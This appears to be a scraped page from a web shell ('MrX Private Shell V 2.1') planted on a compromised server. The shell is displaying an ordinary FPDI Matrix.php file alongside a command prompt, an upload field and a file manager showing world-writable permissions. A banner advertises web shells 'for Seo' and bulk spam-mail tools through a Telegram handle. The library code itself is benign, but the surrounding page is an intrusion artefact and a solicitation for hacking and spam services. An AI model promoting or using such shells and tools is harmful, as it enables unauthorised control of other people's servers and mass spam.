__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

/**
 * This file is part of FPDI
 *
 * @package   setasign\Fpdi
 * @copyright Copyright (c) 2023 Setasign GmbH & Co. KG (https://www.setasign.com)
 * @license   http://opensource.org/licenses/mit-license The MIT License
 */

namespace setasign\Fpdi\Math;

/**
 * A simple 2D-Matrix class
 */
class Matrix
{
    /**
     * @var float
     */
    protected $a;

    /**
     * @var float
     */
    protected $b;

    /**
     * @var float
     */
    protected $c;

    /**
     * @var float
     */
    protected $d;

    /**
     * @var float
     */
    protected $e;

    /**
     * @var float
     */
    protected $f;

    /**
     * @param int|float $a
     * @param int|float $b
     * @param int|float $c
     * @param int|float $d
     * @param int|float $e
     * @param int|float $f
     */
    public function __construct($a = 1, $b = 0, $c = 0, $d = 1, $e = 0, $f = 0)
    {
        $this->a = (float)$a;
        $this->b = (float)$b;
        $this->c = (float)$c;
        $this->d = (float)$d;
        $this->e = (float)$e;
        $this->f = (float)$f;
    }

    /**
     * @return float[]
     */
    public function getValues()
    {
        return [$this->a, $this->b, $this->c, $this->d, $this->e, $this->f];
    }

    /**
     * @param Matrix $by
     * @return Matrix
     */
    public function multiply(self $by)
    {
        $a =
            $this->a * $by->a
            + $this->b * $by->c
            //+ 0 * $by->e
        ;

        $b =
            $this->a * $by->b
            + $this->b * $by->d
            //+ 0 * $by->f
        ;

        $c =
            $this->c * $by->a
            + $this->d * $by->c
            //+ 0 * $by->e
        ;

        $d =
            $this->c * $by->b
            + $this->d * $by->d
            //+ 0 * $by->f
        ;

        $e =
            $this->e * $by->a
            + $this->f * $by->c
            + /*1 * */$by->e;

        $f =
            $this->e * $by->b
            + $this->f * $by->d
            + /*1 * */$by->f;

        return new self($a, $b, $c, $d, $e, $f);
    }
}

Filemanager

Name Type Size Permission Actions
Matrix.php File 2.02 KB 0777
Vector.php File 1.12 KB 0777
Filemanager